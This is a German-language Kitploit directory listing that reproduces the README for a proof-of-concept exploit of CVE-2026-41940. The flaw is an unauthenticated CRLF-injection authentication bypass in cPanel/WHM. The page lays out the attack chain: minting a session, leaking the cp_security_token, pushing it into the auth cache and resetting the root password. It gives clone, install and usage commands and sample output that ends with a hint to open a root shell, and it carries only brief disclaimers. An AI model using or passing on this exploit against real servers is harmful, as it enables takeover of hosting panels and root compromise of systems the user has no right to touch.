Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41940 — Proof-of-Concept-Exploit für CVE-2026-41940, eine nicht authentifizierte Authentifizierungsumgehung in cPanel/WHM mittels CRLF-Injection, um Sicherheitstokens preiszugeben und das Root-Passwort zurückzusetzen. | Kitploit
Tools/GitHubGitHub/rosemary1337/cve-2026-41940
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubrosemary1337/cve-2026-41940

CVE-2026-41940

Proof-of-Concept-Exploit für CVE-2026-41940, eine nicht authentifizierte Authentifizierungsumgehung in cPanel/WHM mittels CRLF-Injection, um Sicherheitstokens preiszugeben und das Root-Passwort zurückzusetzen.

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-41940 Auto Exploit

Python Status Author


Übersicht

CVE-2026-41940 ist ein Proof-of-Concept (PoC)-Exploit, der auf cPanel/WHM abzielt.
Dieser Exploit demonstriert eine unauthentifizierte Authentifizierungsumgehung mithilfe von CRLF-Injection, um Sicherheitstokens zu leaken und Root-Zugriff auf die WHM-Oberfläche zu erlangen, wodurch Aktionen wie das Ändern des Root-Passworts ermöglicht werden.

Haftungsausschluss: Dieses PoC dient nur zu Bildungszwecken. Verwenden Sie es nicht auf Systemen ohne Erlaubnis.


Funktionen

  • Hostname-Auto-Erkennung: Identifiziert automatisch den kanonischen Hostnamen, um Host-Header-Beschränkungen zu umgehen.
  • Pre-Auth-Session-Minting: Erzeugt eine gültige initiale Session für die Injection.
  • CRLF-Injection: Nutzt Injection in Headern, um das cp_security_token zu leaken.
  • Session-Propagation: Erzwingt, dass das geleakte Token in den Auth-Cache des Servers gelangt.
  • Root-Passwort-Reset: Ändert automatisch das WHM-Root-Passwort nach erfolgreicher Umgehung.
  • Minimale Abhängigkeiten: Funktioniert mit der Standard-requests-Bibliothek.

Installation

  1. Klonen Sie das Repository:
root@kitploit:~
git clone https://github.com/Rosemary1337/CVE-2026-41940.git
cd CVE-2026-41940
  1. Installieren Sie die Abhängigkeiten:
root@kitploit:~
pip install requests

Anforderungen: requests, urllib3


Verwendung

root@kitploit:~
python3 CVE_2026_41940.py --target <TARGET_URL> --password <NEUES_PASSWORT>

Beispiel:

root@kitploit:~
python3 CVE_2026_41940.py --target https://target.com:2087 --password MyNewRootPass123!

Argumente


Ausgabe

Die Konsole zeigt:

  • Statusmeldungen [0-4]
  • Erfolg [+]
  • Fehler [!]
  • Info [*]

Beispiel:

root@kitploit:~
[0] hostname = target.local
[1] minting a preauth session...
    session base = :XLNfFj4XjKuS4f9V
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    HTTP 307, leaked token = /cpsess0555762073
[3] firing do_token_denied to propagate raw -> cache...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.110.0.12"}
[*] changing the root password
    passwd -> HTTP 200
[+] now just login to https://target.com:2087 and use the terminal option to get a root shell

Sicherheit & Haftungsausschluss

  • Nur für Bildungs- & Testzwecke.
  • Greifen Sie nicht ohne ausdrückliche Erlaubnis auf Websites an.
  • Verwenden Sie es nur in einer kontrollierten Laborumgebung oder bei autorisierten Penetrationstests.
Tool herunterladen
FlagBeschreibungErforderlichStandard
--targetWHM-Ziel-URL (z. B. https://host:2087)Ja-
--passwordNeues Passwort für den Root-BenutzerJa-
--hostnameHost:-Header überschreibenNeinAuto